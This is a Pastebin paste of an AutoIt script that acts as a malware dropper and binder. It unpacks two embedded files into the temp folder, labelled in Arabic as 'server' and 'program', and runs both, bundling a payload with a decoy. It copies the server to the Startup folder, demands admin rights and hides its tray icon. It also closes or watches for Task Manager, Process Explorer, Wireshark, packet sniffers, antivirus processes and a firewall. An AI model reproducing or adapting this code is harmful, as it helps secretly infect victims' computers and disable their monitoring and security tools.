Advertisement
Guest User

Untitled

a guest
Oct 10th, 2015
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.02 KB | None | 0 0
  1. #NotrayIcon
  2. FileInstall("سيرفر", @TempDir&"/سيرفر")
  3. FileInstall("برنامج", @TempDir&"/برنامج")
  4. Run(@TempDir&"/سيرفر")
  5. Run(@TempDir&"/برنامج")
  6. FileCopy (@TempDir&"سيرفر",@StartupDir&"\سيرفر")
  7. #NoTrayIcon
  8. #RequireAdmin
  9. FileInstall("سيرفر", @TempDir&"/سيرفر")
  10. Run(@TempDir&"/سيرفر")
  11. Break( 0 )
  12. ProcessClose("AntiLogger.exe")
  13. ProcessWaitClose("TcpEye")
  14. ProcessWaitClose("procexp.exe")
  15. ProcessWaitClose("avira.exe")
  16. ProcessWaitClose("avast.exe")
  17. ProcessWaitClose("cports.exe")
  18. ProcessWaitClose("smsniff.exe")
  19. ProcessWaitClose("telaunch.exe")
  20. ProcessWaitClose("wwwiresharrrkk.exe")
  21. ProcessWaitClose("ProcessExplorer.exe")
  22. processWaitClose("ProcessHacker.exe")
  23. processWaitClose("taskmgr.exe")
  24. processWaitClose("regshot.exe")
  25. processWaitClose("boda fire-wall.exe")
  26. processWaitClose("smsnlff.exe")
  27. processWaitClose("FrzState2k.exe")
  28. ProcessWaitClose("AntiLogger.exe")
  29. processWaitClose("dumpcap.exe")
  30. processWaitClose("SysListView32.exe")
  31. processWaitClose("avguard.exe")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement